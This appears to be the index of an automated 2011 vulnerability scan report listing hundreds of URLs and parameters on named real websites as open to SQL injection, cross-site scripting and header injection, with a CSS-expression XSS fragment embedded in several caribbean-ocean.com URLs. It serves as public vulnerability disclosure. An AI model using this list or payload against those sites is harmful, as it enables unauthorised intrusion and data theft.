XSS, SQL Injection, Location Response Splitting, Directory Traversal, 10192011-01

DORK, GHDB, BHDB, CWE-79, CAPEC-86, EXAMPLE, POC, REPORT

Report generated by XSS.CX at Sun Oct 23 12:50:45 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://www.adidasgolf.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.bing.com/local/details.aspx [SRCHUID cookie]

1.3. http://www.bizfind.us/cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx [REST URL parameter 5]

1.4. http://www.caribbean-ocean.com/get-image.php [id parameter]

1.5. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

1.6. http://www.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.7. http://www.insideup.com/wiki/index.php [action parameter]

1.8. http://www.insideup.com/wiki/index.php [title parameter]

1.9. http://www.komonews.com/obits/ [chid parameter]

1.10. http://www.nutter.com/careers.php [CategoryID parameter]

1.11. http://www.quantcast.com/google.com [__utmz cookie]

1.12. http://www.regonline.com/Register/Checkin.aspx [ASP.NET_SessionId cookie]

1.13. https://www.regonline.com/Register/WebResource.axd [CurrentROLSession cookie]

1.14. http://www.reputation.com/ [region cookie]

1.15. http://www.reputation.com/blog/ [region cookie]

1.16. http://www.reputation.com/blog/2011/04/18/survey-over-half-of-adults-would-delete-everything-they-have-ever-posted-about-themselves-online/ [region cookie]

1.17. http://www.reputation.com/contact [region cookie]

1.18. http://www.reputation.com/how_to/ [__utmv cookie]

1.19. http://www.reputation.com/how_to/ [region cookie]

1.20. http://www.reputation.com/how_to/talk-with-your-kids-about-social-media-safety/ [region cookie]

1.21. http://www.reputation.com/itemadded [region cookie]

1.22. http://www.reputation.com/myprivacy [region cookie]

1.23. http://www.reputation.com/services/panelrenderer.php [region cookie]

1.24. https://www.reputation.com/products [region cookie]

1.25. https://www.reputation.com/secure/forgotPassword [region cookie]

1.26. https://www.reputation.com/secure/login [region cookie]

1.27. https://www.reputation.com/secure/login [repdef_ref_code cookie]

1.28. https://www.reputation.com/secure/reg1 [region cookie]

1.29. http://www4.jcpenney.com/jcp/JCPRoute.aspx [REST URL parameter 1]

1.30. http://www4.jcpenney.com/jcp/freeship4u.aspx [REST URL parameter 1]

1.31. http://www5.jcpenney.com/jcp/x6xml.aspx [grptyp parameter]

1.32. http://www5.jcpenney.com/jcp/x6xml.aspx [itemid parameter]

2. File path traversal

3. Cross-site scripting (stored)

3.1. http://www.reputation.com/itemAdded [entityId parameter]

3.2. http://www.reputation.com/itemAdded [entityId parameter]

3.3. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]

3.4. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]

3.5. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]

3.6. http://www.reputation.com/services/panelrenderer.php [entityId parameter]

4. HTTP header injection

4.1. http://www.regonline.com/marketing/event/features/ [name of an arbitrarily supplied request parameter]

4.2. http://www.regonline.com/marketing/event/pricing/ [name of an arbitrarily supplied request parameter]

4.3. http://www.regonline.com/marketing/event/testimonials/ [name of an arbitrarily supplied request parameter]

4.4. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

5. Cross-site scripting (reflected)

5.1. http://www.4shared.com/advertise/ [REST URL parameter 1]

5.2. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 1]

5.3. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 2]

5.4. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 3]

5.5. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 4]

5.6. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 1]

5.7. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 2]

5.8. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 3]

5.9. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 4]

5.10. http://www.4shared.com/contact.jsp [REST URL parameter 1]

5.11. http://www.4shared.com/css/common.css [REST URL parameter 1]

5.12. http://www.4shared.com/css/common.css [REST URL parameter 2]

5.13. http://www.4shared.com/css/main.css [REST URL parameter 1]

5.14. http://www.4shared.com/css/main.css [REST URL parameter 2]

5.15. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

5.16. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

5.17. http://www.4shared.com/desktop/ [REST URL parameter 1]

5.18. http://www.4shared.com/enter.jsp [REST URL parameter 1]

5.19. http://www.4shared.com/enter.jsp [au parameter]

5.20. http://www.4shared.com/faq.jsp [REST URL parameter 1]

5.21. http://www.4shared.com/favicon.ico [REST URL parameter 1]

5.22. http://www.4shared.com/icons/16x16/ [REST URL parameter 1]

5.23. http://www.4shared.com/icons/16x16/ [REST URL parameter 2]

5.24. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 1]

5.25. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 2]

5.26. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 1]

5.27. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 2]

5.28. http://www.4shared.com/images/spacer.gif [REST URL parameter 1]

5.29. http://www.4shared.com/images/spacer.gif [REST URL parameter 2]

5.30. http://www.4shared.com/index.jsp [REST URL parameter 1]

5.31. http://www.4shared.com/js/index.js [REST URL parameter 1]

5.32. http://www.4shared.com/js/index.js [REST URL parameter 2]

5.33. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1]

5.34. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2]

5.35. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1]

5.36. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2]

5.37. http://www.4shared.com/loginBox.jsp [REST URL parameter 1]

5.38. http://www.4shared.com/m/android.jsp [REST URL parameter 1]

5.39. http://www.4shared.com/m/android.jsp [REST URL parameter 2]

5.40. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 1]

5.41. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 2]

5.42. http://www.4shared.com/m/symbian.jsp [REST URL parameter 1]

5.43. http://www.4shared.com/m/symbian.jsp [REST URL parameter 2]

5.44. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 1]

5.45. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 2]

5.46. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 3]

5.47. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 1]

5.48. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 2]

5.49. http://www.4shared.com/premium.jsp [REST URL parameter 1]

5.50. http://www.4shared.com/press_room/ [REST URL parameter 1]

5.51. http://www.4shared.com/privacy.jsp [REST URL parameter 1]

5.52. http://www.4shared.com/q/BAQD/1/books_office [REST URL parameter 1]

5.53. http://www.4shared.com/q/BAQD/1/music [REST URL parameter 1]

5.54. http://www.4shared.com/q/BAQD/1/photo [REST URL parameter 1]

5.55. http://www.4shared.com/q/BAQD/1/video [REST URL parameter 1]

5.56. http://www.4shared.com/q/BBQD/1/books_office [REST URL parameter 1]

5.57. http://www.4shared.com/q/BBQD/1/music [REST URL parameter 1]

5.58. http://www.4shared.com/q/BBQD/1/photo [REST URL parameter 1]

5.59. http://www.4shared.com/q/BBQD/1/video [REST URL parameter 1]

5.60. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1]

5.61. http://www.4shared.com/resellers.jsp [REST URL parameter 1]

5.62. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 1]

5.63. http://www.4shared.com/servlet/ProgressStatus [REST URL parameter 2]

5.64. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1]

5.65. http://www.4shared.com/signUpBox.jsp [df parameter]

5.66. http://www.4shared.com/signup.jsp [REST URL parameter 1]

5.67. http://www.4shared.com/terms.jsp [REST URL parameter 1]

5.68. http://www.4shared.com/toolbar/ [REST URL parameter 1]

5.69. http://www.addthis.com/bookmark.php [REST URL parameter 1]

5.70. http://www.addthis.com/bookmark.php [REST URL parameter 1]

5.71. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

5.72. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

5.73. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]

5.74. http://www.barracudanetworks.com/ns/company/ [name of an arbitrarily supplied request parameter]

5.75. http://www.barracudanetworks.com/ns/privacy/ [name of an arbitrarily supplied request parameter]

5.76. http://www.barracudanetworks.com/ns/products/ [name of an arbitrarily supplied request parameter]

5.77. http://www.barracudanetworks.com/ns/products/index.php [name of an arbitrarily supplied request parameter]

5.78. http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php [name of an arbitrarily supplied request parameter]

5.79. http://www.barracudanetworks.com/ns/products/spam_overview.php [name of an arbitrarily supplied request parameter]

5.80. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php [name of an arbitrarily supplied request parameter]

5.81. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php [name of an arbitrarily supplied request parameter]

5.82. http://www.barracudanetworks.com/ns/purchase/ [name of an arbitrarily supplied request parameter]

5.83. https://www.barracudanetworks.com/ns/products/request_eval_unit.php [name of an arbitrarily supplied request parameter]

5.84. http://www.bing.com/local/assetgeneration.handler/ [REST URL parameter 2]

5.85. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 2]

5.86. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 3]

5.87. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 4]

5.88. http://www.bizfind.us/Index.asp [name of an arbitrarily supplied request parameter]

5.89. http://www.bizfind.us/impressum.asp [name of an arbitrarily supplied request parameter]

5.90. http://www.bizfind.us/privacy.asp [name of an arbitrarily supplied request parameter]

5.91. http://www.bizfind.us/pubblicita.asp [name of an arbitrarily supplied request parameter]

5.92. http://www.bizfind.us/search.asp [cerca parameter]

5.93. http://www.bizfind.us/search.asp [cerco parameter]

5.94. http://www.bizfind.us/sitemap.asp [name of an arbitrarily supplied request parameter]

5.95. http://www.bluefountainmedia.com/blog [name of an arbitrarily supplied request parameter]

5.96. http://www.bluefountainmedia.com/blog/ [name of an arbitrarily supplied request parameter]

5.97. http://www.bluefountainmedia.com/business [name of an arbitrarily supplied request parameter]

5.98. http://www.bluefountainmedia.com/business/ [name of an arbitrarily supplied request parameter]

5.99. http://www.briangardner.com/ [name of an arbitrarily supplied request parameter]

5.100. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]

5.101. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]

5.102. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]

5.103. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif [REST URL parameter 2]

5.104. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif [REST URL parameter 3]

5.105. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg [REST URL parameter 2]

5.106. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg [REST URL parameter 3]

5.107. http://www.caribbean-ocean.com/enq.php/stylesheet.css [REST URL parameter 2]

5.108. http://www.caribbean-ocean.com/get-image.php [id parameter]

5.109. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

5.110. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif [REST URL parameter 2]

5.111. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg [REST URL parameter 2]

5.112. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css [REST URL parameter 2]

5.113. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif [REST URL parameter 2]

5.114. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif [REST URL parameter 3]

5.115. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg [REST URL parameter 2]

5.116. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg [REST URL parameter 3]

5.117. http://www.caribbean-ocean.com/get-in-touch.php/stylesheet.css [REST URL parameter 2]

5.118. http://www.coach.com/online/handbags/Home-10551-10051 [REST URL parameter 3]

5.119. http://www.coach.com/online/handbags/Home-10551-10051 [REST URL parameter 3]

5.120. http://www.coach.com/online/handbags/PopUnderView [catalogId parameter]

5.121. http://www.coach.com/online/handbags/PopUnderView [popunder parameter]

5.122. http://www.coach.com/online/handbags/PopUnderView [storeId parameter]

5.123. http://www.coach.com/online/handbags/PopUnderView [storeId parameter]

5.124. http://www.conduit-banners.com/drawtoolbar/ [culture parameter]

5.125. https://www.demandstudios.com/application.html [role parameter]

5.126. http://www.digitalbond.com/2008/07/20/managing-your-security-career/ [REST URL parameter 4]

5.127. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 1]

5.128. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 2]

5.129. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 3]

5.130. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 4]

5.131. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 5]

5.132. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 6]

5.133. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]

5.134. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

5.135. http://www.google.com/search [tch parameter]

5.136. http://www.insideup.com/forgotPassword.html [username parameter]

5.137. http://www.insideup.com/login.html [password parameter]

5.138. http://www.insideup.com/login.html [username parameter]

5.139. http://www.insideup.com/updateCity.html [city parameter]

5.140. http://www.insideup.com/wiki/index.php [action parameter]

5.141. http://www.intensedebate.com/js/getCommentLink.php [REST URL parameter 2]

5.142. http://www.intensedebate.com/js/getCommentLink.php [name of an arbitrarily supplied request parameter]

5.143. http://www.intensedebate.com/js/getCommentLink.php [postid parameter]

5.144. http://www.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

5.145. http://www.jotform.com/favicon.ico [REST URL parameter 1]

5.146. http://www.jotform.com/form/2910946098 [REST URL parameter 1]

5.147. http://www.komonews.com/home/video/116474128.html [name of an arbitrarily supplied request parameter]

5.148. http://www.komonews.com/home/video/116545678.html [name of an arbitrarily supplied request parameter]

5.149. http://www.komonews.com/home/video/116673784.html [name of an arbitrarily supplied request parameter]

5.150. http://www.komonews.com/home/video/116675584.html [name of an arbitrarily supplied request parameter]

5.151. http://www.komonews.com/home/video/116675749.html [name of an arbitrarily supplied request parameter]

5.152. http://www.komonews.com/home/video/116702184.html [name of an arbitrarily supplied request parameter]

5.153. http://www.komonews.com/news/116650859.html [name of an arbitrarily supplied request parameter]

5.154. http://www.komonews.com/news/116650859.html [skipthumb parameter]

5.155. http://www.komonews.com/news/116652534.html [name of an arbitrarily supplied request parameter]

5.156. http://www.komonews.com/news/116694569.html [name of an arbitrarily supplied request parameter]

5.157. http://www.komonews.com/news/116694569.html [skipthumb parameter]

5.158. http://www.komonews.com/news/116694614.html [name of an arbitrarily supplied request parameter]

5.159. http://www.komonews.com/news/116707379.html [name of an arbitrarily supplied request parameter]

5.160. http://www.komonews.com/news/116727124.html [name of an arbitrarily supplied request parameter]

5.161. http://www.komonews.com/news/boeing/116707614.html [name of an arbitrarily supplied request parameter]

5.162. http://www.komonews.com/news/business/116735244.html [name of an arbitrarily supplied request parameter]

5.163. http://www.komonews.com/news/business/116739564.html [name of an arbitrarily supplied request parameter]

5.164. http://www.komonews.com/news/business/116739939.html [name of an arbitrarily supplied request parameter]

5.165. http://www.komonews.com/news/business/116740159.html [name of an arbitrarily supplied request parameter]

5.166. http://www.komonews.com/news/business/116740389.html [name of an arbitrarily supplied request parameter]

5.167. http://www.komonews.com/news/consumer/116673109.html [name of an arbitrarily supplied request parameter]

5.168. http://www.komonews.com/news/consumer/116704069.html [name of an arbitrarily supplied request parameter]

5.169. http://www.komonews.com/news/entertainment/116123569.html [name of an arbitrarily supplied request parameter]

5.170. http://www.komonews.com/news/entertainment/116189709.html [name of an arbitrarily supplied request parameter]

5.171. http://www.komonews.com/news/entertainment/116665019.html [name of an arbitrarily supplied request parameter]

5.172. http://www.komonews.com/news/entertainment/116680394.html [name of an arbitrarily supplied request parameter]

5.173. http://www.komonews.com/news/entertainment/116692424.html [name of an arbitrarily supplied request parameter]

5.174. http://www.komonews.com/news/entertainment/116704174.html [name of an arbitrarily supplied request parameter]

5.175. http://www.komonews.com/news/entertainment/116707059.html [name of an arbitrarily supplied request parameter]

5.176. http://www.komonews.com/news/entertainment/116707059.html [ref parameter]

5.177. http://www.komonews.com/news/entertainment/116710289.html [name of an arbitrarily supplied request parameter]

5.178. http://www.komonews.com/news/entertainment/116737029.html [name of an arbitrarily supplied request parameter]

5.179. http://www.komonews.com/news/entertainment/116737029.html [ref parameter]

5.180. http://www.komonews.com/news/entertainment/116737724.html [name of an arbitrarily supplied request parameter]

5.181. http://www.komonews.com/news/entertainment/116737724.html [ref parameter]

5.182. http://www.komonews.com/news/health/116753189.html [name of an arbitrarily supplied request parameter]

5.183. http://www.komonews.com/news/local/116231884.html [name of an arbitrarily supplied request parameter]

5.184. http://www.komonews.com/news/local/116509853.html [name of an arbitrarily supplied request parameter]

5.185. http://www.komonews.com/news/local/116694614.html [name of an arbitrarily supplied request parameter]

5.186. http://www.komonews.com/news/local/116703604.html [name of an arbitrarily supplied request parameter]

5.187. http://www.komonews.com/news/local/116703604.html [skipthumb parameter]

5.188. http://www.komonews.com/news/local/116703604.html [tab parameter]

5.189. http://www.komonews.com/news/local/116706579.html [name of an arbitrarily supplied request parameter]

5.190. http://www.komonews.com/news/local/116707379.html [name of an arbitrarily supplied request parameter]

5.191. http://www.komonews.com/news/local/116712649.html [name of an arbitrarily supplied request parameter]

5.192. http://www.komonews.com/news/local/116714899.html [name of an arbitrarily supplied request parameter]

5.193. http://www.komonews.com/news/local/116727124.html [name of an arbitrarily supplied request parameter]

5.194. http://www.komonews.com/news/local/116745309.html [name of an arbitrarily supplied request parameter]

5.195. http://www.komonews.com/news/local/116752479.html [name of an arbitrarily supplied request parameter]

5.196. http://www.komonews.com/news/local/116755469.html [name of an arbitrarily supplied request parameter]

5.197. http://www.komonews.com/news/national/115640079.html [name of an arbitrarily supplied request parameter]

5.198. http://www.komonews.com/news/national/116404039.html [name of an arbitrarily supplied request parameter]

5.199. http://www.komonews.com/news/national/116502428.html [name of an arbitrarily supplied request parameter]

5.200. http://www.komonews.com/news/national/116713504.html [name of an arbitrarily supplied request parameter]

5.201. http://www.komonews.com/news/national/116734714.html [name of an arbitrarily supplied request parameter]

5.202. http://www.komonews.com/news/national/116736489.html [name of an arbitrarily supplied request parameter]

5.203. http://www.komonews.com/news/national/116736624.html [name of an arbitrarily supplied request parameter]

5.204. http://www.komonews.com/news/national/116747399.html [name of an arbitrarily supplied request parameter]

5.205. http://www.komonews.com/news/national/116750534.html [name of an arbitrarily supplied request parameter]

5.206. http://www.komonews.com/news/national/116750784.html [name of an arbitrarily supplied request parameter]

5.207. http://www.komonews.com/news/offbeat/116565253.html [name of an arbitrarily supplied request parameter]

5.208. http://www.komonews.com/news/offbeat/116611588.html [name of an arbitrarily supplied request parameter]

5.209. http://www.komonews.com/news/offbeat/116622758.html [name of an arbitrarily supplied request parameter]

5.210. http://www.komonews.com/news/offbeat/116623473.html [name of an arbitrarily supplied request parameter]

5.211. http://www.komonews.com/news/offbeat/116690659.html [name of an arbitrarily supplied request parameter]

5.212. http://www.komonews.com/news/offbeat/116708664.html [name of an arbitrarily supplied request parameter]

5.213. http://www.komonews.com/news/offbeat/116708664.html [ref parameter]

5.214. http://www.komonews.com/news/offbeat/116708719.html [name of an arbitrarily supplied request parameter]

5.215. http://www.komonews.com/news/offbeat/116708719.html [ref parameter]

5.216. http://www.komonews.com/news/offbeat/116749349.html [name of an arbitrarily supplied request parameter]

5.217. http://www.komonews.com/news/offbeat/116749349.html [ref parameter]

5.218. http://www.komonews.com/news/tech/116596303.html [name of an arbitrarily supplied request parameter]

5.219. http://www.komonews.com/news/tech/116609493.html [name of an arbitrarily supplied request parameter]

5.220. http://www.komonews.com/news/tech/116666119.html [name of an arbitrarily supplied request parameter]

5.221. http://www.komonews.com/news/tech/116674969.html [name of an arbitrarily supplied request parameter]

5.222. http://www.komonews.com/news/tech/116740874.html [name of an arbitrarily supplied request parameter]

5.223. http://www.komonews.com/news/tech/116748424.html [name of an arbitrarily supplied request parameter]

5.224. http://www.komonews.com/obits [name of an arbitrarily supplied request parameter]

5.225. http://www.komonews.com/obits/ [chid parameter]

5.226. http://www.komonews.com/obits/ [name of an arbitrarily supplied request parameter]

5.227. http://www.komonews.com/opinion/kenschram/116741919.html [name of an arbitrarily supplied request parameter]

5.228. http://www.komonews.com/sports/116570948.html [name of an arbitrarily supplied request parameter]

5.229. http://www.komonews.com/sports/116572113.html [name of an arbitrarily supplied request parameter]

5.230. http://www.komonews.com/sports/116601093.html [name of an arbitrarily supplied request parameter]

5.231. http://www.komonews.com/sports/116612208.html [name of an arbitrarily supplied request parameter]

5.232. http://www.komonews.com/sports/116713754.html [name of an arbitrarily supplied request parameter]

5.233. http://www.komonews.com/younews [c parameter]

5.234. http://www.komonews.com/younews [cid parameter]

5.235. http://www.komonews.com/younews [name of an arbitrarily supplied request parameter]

5.236. http://www.lesechos.fr/investisseurs/actualites-boursieres/0201292688069-soupcons-d-espionnage-chez-safran.htm [REST URL parameter 3]

5.237. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

5.238. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

5.239. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

5.240. http://www.ndbc.noaa.gov/rss/ndbc_obs_search.php [name of an arbitrarily supplied request parameter]

5.241. http://www.nutter.com/attorneys.php [AttorneyID parameter]

5.242. http://www.nutter.com/careers.php [CategoryID parameter]

5.243. http://www.quantcast.com/4shared.com [REST URL parameter 1]

5.244. http://www.quantcast.com/about.com [REST URL parameter 1]

5.245. http://www.quantcast.com/ad4game.com [REST URL parameter 1]

5.246. http://www.quantcast.com/adobe.com [REST URL parameter 1]

5.247. http://www.quantcast.com/allrecipes.com [REST URL parameter 1]

5.248. http://www.quantcast.com/amazon.com [REST URL parameter 1]

5.249. http://www.quantcast.com/ancestry.com [REST URL parameter 1]

5.250. http://www.quantcast.com/angelfire.com [REST URL parameter 1]

5.251. http://www.quantcast.com/answerbag.com [REST URL parameter 1]

5.252. http://www.quantcast.com/answers.com [REST URL parameter 1]

5.253. http://www.quantcast.com/aol.com [REST URL parameter 1]

5.254. http://www.quantcast.com/apple.com [REST URL parameter 1]

5.255. http://www.quantcast.com/articlesbase.com [REST URL parameter 1]

5.256. http://www.quantcast.com/ask.com [REST URL parameter 1]

5.257. http://www.quantcast.com/askmen.com [REST URL parameter 1]

5.258. http://www.quantcast.com/associatedcontent.com [REST URL parameter 1]

5.259. http://www.quantcast.com/att.com [REST URL parameter 1]

5.260. http://www.quantcast.com/autotrader.com [REST URL parameter 1]

5.261. http://www.quantcast.com/babycenter.com [REST URL parameter 1]

5.262. http://www.quantcast.com/bankofamerica.com [REST URL parameter 1]

5.263. http://www.quantcast.com/barnesandnoble.com [REST URL parameter 1]

5.264. http://www.quantcast.com/bbc.co.uk [REST URL parameter 1]

5.265. http://www.quantcast.com/bestbuy.com [REST URL parameter 1]

5.266. http://www.quantcast.com/bing.com [REST URL parameter 1]

5.267. http://www.quantcast.com/bizrate.com [REST URL parameter 1]

5.268. http://www.quantcast.com/blogger.com [REST URL parameter 1]

5.269. http://www.quantcast.com/blogspot.com [REST URL parameter 1]

5.270. http://www.quantcast.com/blurtit.com [REST URL parameter 1]

5.271. http://www.quantcast.com/borders.com [REST URL parameter 1]

5.272. http://www.quantcast.com/boreme.com [REST URL parameter 1]

5.273. http://www.quantcast.com/brothersoft.com [REST URL parameter 1]

5.274. http://www.quantcast.com/buycheapr.com [REST URL parameter 1]

5.275. http://www.quantcast.com/ca.gov [REST URL parameter 1]

5.276. http://www.quantcast.com/candystand.com [REST URL parameter 1]

5.277. http://www.quantcast.com/capitalone.com [REST URL parameter 1]

5.278. http://www.quantcast.com/careerbuilder.com [REST URL parameter 1]

5.279. http://www.quantcast.com/cbssports.com [REST URL parameter 1]

5.280. http://www.quantcast.com/chacha.com [REST URL parameter 1]

5.281. http://www.quantcast.com/chase.com [REST URL parameter 1]

5.282. http://www.quantcast.com/cnbc.com [REST URL parameter 1]

5.283. http://www.quantcast.com/cnet.com [REST URL parameter 1]

5.284. http://www.quantcast.com/cnn.com [REST URL parameter 1]

5.285. http://www.quantcast.com/comcast.com [REST URL parameter 1]

5.286. http://www.quantcast.com/comcast.net [REST URL parameter 1]

5.287. http://www.quantcast.com/coolmath-games.com [REST URL parameter 1]

5.288. http://www.quantcast.com/craigslist.org [REST URL parameter 1]

5.289. http://www.quantcast.com/dailymotion.com [REST URL parameter 1]

5.290. http://www.quantcast.com/dell.com [REST URL parameter 1]

5.291. http://www.quantcast.com/deviantart.com [REST URL parameter 1]

5.292. http://www.quantcast.com/digg.com [REST URL parameter 1]

5.293. http://www.quantcast.com/directv.com [REST URL parameter 1]

5.294. http://www.quantcast.com/discovery.com [REST URL parameter 1]

5.295. http://www.quantcast.com/docstoc.com [REST URL parameter 1]

5.296. http://www.quantcast.com/drudgereport.com [REST URL parameter 1]

5.297. http://www.quantcast.com/drugs.com [REST URL parameter 1]

5.298. http://www.quantcast.com/ebay.com [REST URL parameter 1]

5.299. http://www.quantcast.com/edmunds.com [REST URL parameter 1]

5.300. http://www.quantcast.com/ehow.com [REST URL parameter 1]

5.301. http://www.quantcast.com/etsy.com [REST URL parameter 1]

5.302. http://www.quantcast.com/evite.com [REST URL parameter 1]

5.303. http://www.quantcast.com/ew.com [REST URL parameter 1]

5.304. http://www.quantcast.com/examiner.com [REST URL parameter 1]

5.305. http://www.quantcast.com/expedia.com [REST URL parameter 1]

5.306. http://www.quantcast.com/ezinearticles.com [REST URL parameter 1]

5.307. http://www.quantcast.com/facebook.com [REST URL parameter 1]

5.308. http://www.quantcast.com/fedex.com [REST URL parameter 1]

5.309. http://www.quantcast.com/filestube.com [REST URL parameter 1]

5.310. http://www.quantcast.com/filmannex.com [REST URL parameter 1]

5.311. http://www.quantcast.com/fixya.com [REST URL parameter 1]

5.312. http://www.quantcast.com/flickr.com [REST URL parameter 1]

5.313. http://www.quantcast.com/foodnetwork.com [REST URL parameter 1]

5.314. http://www.quantcast.com/formspring.me [REST URL parameter 1]

5.315. http://www.quantcast.com/foxnews.com [REST URL parameter 1]

5.316. http://www.quantcast.com/gawker.com [REST URL parameter 1]

5.317. http://www.quantcast.com/global/personalHeader [REST URL parameter 1]

5.318. http://www.quantcast.com/global/personalHeader [REST URL parameter 2]

5.319. http://www.quantcast.com/go.com [REST URL parameter 1]

5.320. http://www.quantcast.com/godaddy.com [REST URL parameter 1]

5.321. http://www.quantcast.com/google.com [REST URL parameter 1]

5.322. http://www.quantcast.com/grindtv.com [REST URL parameter 1]

5.323. http://www.quantcast.com/healthgrades.com [REST URL parameter 1]

5.324. http://www.quantcast.com/homedepot.com [REST URL parameter 1]

5.325. http://www.quantcast.com/howstuffworks.com [REST URL parameter 1]

5.326. http://www.quantcast.com/hp.com [REST URL parameter 1]

5.327. http://www.quantcast.com/hubpages.com [REST URL parameter 1]

5.328. http://www.quantcast.com/huffingtonpost.com [REST URL parameter 1]

5.329. http://www.quantcast.com/hulu.com [REST URL parameter 1]

5.330. http://www.quantcast.com/ign.com [REST URL parameter 1]

5.331. http://www.quantcast.com/imdb.com [REST URL parameter 1]

5.332. http://www.quantcast.com/indeed.com [REST URL parameter 1]

5.333. http://www.quantcast.com/intuit.com [REST URL parameter 1]

5.334. http://www.quantcast.com/irs.gov [REST URL parameter 1]

5.335. http://www.quantcast.com/js/top-sites.js [REST URL parameter 1]

5.336. http://www.quantcast.com/js/top-sites.js [REST URL parameter 2]

5.337. http://www.quantcast.com/justanswer.com [REST URL parameter 1]

5.338. http://www.quantcast.com/kohls.com [REST URL parameter 1]

5.339. http://www.quantcast.com/komonews.com [REST URL parameter 1]

5.340. http://www.quantcast.com/legacy.com [REST URL parameter 1]

5.341. http://www.quantcast.com/linkedin.com [REST URL parameter 1]

5.342. http://www.quantcast.com/live.com [REST URL parameter 1]

5.343. http://www.quantcast.com/local.com [REST URL parameter 1]

5.344. http://www.quantcast.com/localpages.com [REST URL parameter 1]

5.345. http://www.quantcast.com/lowes.com [REST URL parameter 1]

5.346. http://www.quantcast.com/manta.com [REST URL parameter 1]

5.347. http://www.quantcast.com/mapquest.com [REST URL parameter 1]

5.348. http://www.quantcast.com/match.com [REST URL parameter 1]

5.349. http://www.quantcast.com/mayoclinic.com [REST URL parameter 1]

5.350. http://www.quantcast.com/medicinenet.com [REST URL parameter 1]

5.351. http://www.quantcast.com/microsoft.com [REST URL parameter 1]

